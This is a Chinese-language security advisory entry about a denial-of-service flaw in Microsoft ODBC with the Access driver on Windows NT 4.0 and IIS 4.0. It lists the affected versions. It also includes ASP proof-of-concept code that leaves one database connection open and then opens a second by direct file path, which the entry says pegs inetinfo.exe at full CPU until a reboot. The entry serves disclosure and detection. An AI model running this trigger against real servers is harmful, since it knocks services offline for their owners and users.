|
|
|
|
18、MS ODBC数据库连接溢出导致NT/9x拒绝服务攻击
漏 洞 描 述:
Microsoft ODBC数据库在连接和断开时可能存在潜在的溢出问题(Microsoft ACCESS数据库相关)。
如果不取消连接而直接和第二个数据库相连接,可能导致服务停止。
影响系统:
ODBC 版本: 3.510.3711.0
ODBC Access驱动版本: 3.51.1029.00
OS 版本: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507)
漏洞检测方法如下:
ODBC 连接源名称: miscdb
ODBC 数据库型号: MS Access
ODBC 假设路径: d:\data\misc.mdb
ASP代码如下:
<%
set connVB = server.createobject(ADODB.Connection)
connVB.open DRIVER={Microsoft Access Driver (*.mdb)}; DSN=miscdb
%>
<html>
<body>
...lots of html removed...
<!-- We Connect to DB1 -->
<%
set connGlobal = server.createobject(ADODB.Connection)
connGlobal.Open DSN=miscdb;User=sa
mSQL = arb SQL Statement
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal(resultfrommiscdb)
rsGlobal.movenext
wend
'rsGlobal.close
'set rsGlobal = nothing
'connGlobal.close
'set connGlobal = nothing
' Note we do NOT close the connection
%>
<!-- Call the same database by means of DBQ direct file access -->
<%
set connGlobal = server.createobject(ADODB.Connection)
connGlobal.Open DRIVER={Microsoft Access Driver (*.mdb)};
DBQ=d:\data\misc.mdb
mSQL = arb SQL Statement
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal(resultfrommiscdb)
rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
' Note we DO close the connection
%>
在这种情况下,IIS处理进程将会停顿,CPU使用率由于inetinfo.exe进程将达到100%。只有重新启动计算机才能恢复。nbsp |
|
|
